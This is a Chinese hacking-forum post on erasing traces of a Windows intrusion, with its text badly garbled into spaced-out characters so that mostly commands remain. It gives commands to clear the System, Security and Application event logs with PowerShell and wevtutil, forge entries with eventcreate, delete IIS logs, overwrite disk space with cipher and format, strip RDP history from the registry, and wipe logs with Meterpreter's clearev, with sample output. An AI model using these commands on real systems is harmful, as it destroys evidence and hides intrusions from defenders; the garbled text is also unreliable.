设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 系统 [1017] 2020-09-09_Windows入侵痕迹清理技巧
返回列表 发新帖
查看: 11|回复: 0

[1017] 2020-09-09_Windows入侵痕迹清理技巧

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 7 天前 | 显示全部楼层 |阅读模式
2020-09-09_Windows入侵痕迹清理技巧 W i n d o w s     B y p a s s   B y p a s s   2 0 2 0 - 0 9 - 0 9 I P 0 1 W i n d o w s w i n d o w s   w i n d o w s   1 ,     2 W i n d o w s 3 s v c h o s t . e x e 线 线 线 4 W i n d o w s W i n d o w s 5 W i n d o w s % S y s t e m R o o t % S y s t e m 3 2 W i n e v t L o g s S y s t e m . e v t x % S y s t e m R o o t % S y s t e m 3 2 W i n e v t L o g s S e c u r i t y . e v t x % S y s t e m R o o t % S y s t e m 3 2 W i n e v t L o g s A p p l i c a t i o n . e v t x H K E Y _ L O C A L _ M A C H I N E s y s t e m C u r r e n t C o n t r o l S e t S e r v i c e s E v e n t l o g e v e n t v w r P o w e r S h e l l   - C o m m a n d   " &   { C l e a r - E v e n t l o g   - L o g   A p p l i c a t i o n , S y s t e m , S e c u r i t y } " G e t - W i n E v e n t   - L i s t L o g   A p p l i c a t i o n , S e t u p , S e c u r i t y   - F o r c e   |   %   { W e v t u t i l . e x e   c l   $ _ . L o g n a m e } g i t h u b h t t p s : / / g i t h u b . c o m / h l l d z / I n v o k e - P h a n t 0 m g i t h u b h t t p s : / / g i t h u b . c o m / Q A X - A - T e a m / E v e n t C l e a n e r
使 e v e n t c r e a t e 使 0 2 I I S I I S W W W 0 3 W i n d o w s 1 S h i f t + D e l e t e 使 S h i f t + D e l e t e 2 C i p h e r   C i p h e r     / W   D   使   0 x 0 0   0 x F F 3 F o r m a t F o r m a t     / P     D     8   0 4 e v e n t c r e a t e   - l   s y s t e m   - s o   a d m i n i s t r a t o r   - t   w a r n i n g   - d   " t h i s   i s   a   t e s t "   - i d   5 0 0 % S y s t e m D r i v e % i n e t p u b l o g s L o g F i l e s W 3 S V C 1 n e t   s t o p   w 3 s v c d e l   * . * n e t   s t a r t   w 3 s v c D : t o o l s c i p h e r   / w : D : t o o l s f o r m a t   D :   / P : 8 c l e a r . b a t @ e c h o   o f f
0 5 M e t a s p l o i t   1 3 c l e a r v @ e c h o   o f f r e g   d e l e t e   " H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t D e f a u l t "   / v a   / f r e g   d e l e t e   " H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t S e r v e r s "   / f r e g   a d d   " H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t S e r v e r s " c d   % u s e r p r o f i l e % d o c u m e n t s a t t r i b   D e f a u l t . r d p   - s   - h d e l   D e f a u l t . r d p m e t e r p r e t e r   >   r u n   e v e n t _ m a n a g e r     - i       [ * ]   R e t r i v i n g   E v e n t   L o g   C o n f i g u r a t i o n E v e n t   L o g s   o n   S y s t e m = = = = = = = = = = = = = = = = = = = =   N a m e                                         R e t e n t i o n     M a x i m u m   S i z e     R e c o r d s   - - - -                                         - - - - - - - - -     - - - - - - - - - - - -     - - - - - - -   A p p l i c a t i o n                           D i s a b l e d       2 0 9 7 1 5 2 0 K           2 1 4 9   H a r d w a r e E v e n t s                     D i s a b l e d       2 0 9 7 1 5 2 0 K           0   I n t e r n e t   E x p l o r e r               D i s a b l e d       K                           0   K e y   M a n a g e m e n t   S e r v i c e     D i s a b l e d       2 0 9 7 1 5 2 0 K           0   S e c u r i t y                                 D i s a b l e d       2 0 9 7 1 5 2 0 K           1 7 2 6   S y s t e m                                     D i s a b l e d       2 0 9 7 1 5 2 0 K           3 5 5 5   W i n d o w s   P o w e r S h e l l             D i s a b l e d       1 5 7 2 8 6 4 0 K           1 3 8 2 m e t e r p r e t e r   >   r u n   e v e n t _ m a n a g e r     - c m e t e r p r e t e r   >   c l e a r e v   [ * ]   W i p i n g   4   r e c o r d s   f r o m   A p p l i c a t i o n . . . [ * ]   W i p i n g   8   r e c o r d s   f r o m   S y s t e m . . . [ * ]   W i p i n g   7   r e c o r d s   f r o m   S e c u r i t y . . .
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 10:21 , Processed in 0.139241 second(s), 30 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表